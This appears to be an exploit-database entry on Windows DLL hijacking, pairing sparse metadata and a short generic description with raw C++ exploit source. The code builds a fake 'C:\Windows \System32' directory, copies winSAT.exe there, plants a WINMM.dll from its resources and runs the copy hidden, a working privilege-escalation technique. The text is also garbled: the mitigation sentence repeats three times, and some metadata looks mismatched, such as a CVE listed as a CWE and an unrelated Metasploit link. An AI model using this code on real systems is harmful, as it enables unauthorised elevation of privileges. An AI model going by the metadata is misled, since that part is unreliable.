DLL Hijacking Vulnerability

vendor:

Windows 7

by:

Unknown

8.8

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: Windows 7

Affected Version From: Windows 7

Affected Version To: Windows 10

Patch Exists: YES

Related CWE: CVE-2010-2568

CPE: o:microsoft:windows_7

Metasploit: https://www.rapid7.com/db/modules/post/windows/gather/forensics/fanny_bmp_check/

Other Scripts: N/A

Platforms Tested: Windows

2010

DLL Hijacking Vulnerability

DLL hijacking is a type of vulnerability that can be exploited by attackers to execute malicious code on a target system. It occurs when an application looks for a specific DLL to run a certain task, but an attacker provides a malicious DLL instead. This malicious DLL is then executed on the target system, allowing the attacker to gain control of the system. The vulnerability was first discovered in 2010 and affects Windows systems.

Mitigation:

To mitigate DLL hijacking, organizations should ensure that all applications are running with the latest security patches and that all DLLs are properly signed. Additionally, organizations should ensure that all applications are running with the latest security patches and that all DLLs are properly signed. Additionally, organizations should ensure that all applications are running with the latest security patches and that all DLLs are properly signed.

Source

Exploit-DB raw data:

#include "stdafx.h"
#include <Windows.h>
#include "resource.h"

void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) {
	HMODULE hMod = GetModuleHandle(NULL);
	HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName);
	DWORD dllSize = SizeofResource(hMod, res);
	void* dllBuff = LoadResource(hMod, res);
	HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
	DWORD sizeOut;
	WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL);
	CloseHandle(hDll);
}

int main()
{
	_SHELLEXECUTEINFOW se = {};
	//Create Mock SystemRoot Directory
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
	CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false);

	//Drop our dll for hijack
	DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");

	//Execute our winSAT.exe copy from fake trusted directory
	se.cbSize = sizeof(_SHELLEXECUTEINFOW);
	se.lpFile =  L"C:\\Windows \\System32\\winSAT.exe";
	se.lpParameters = L"formal";
	se.nShow = SW_HIDE;
	se.hwnd = NULL;
	se.lpDirectory = NULL;
	ShellExecuteEx(&se);

    	return 0;
}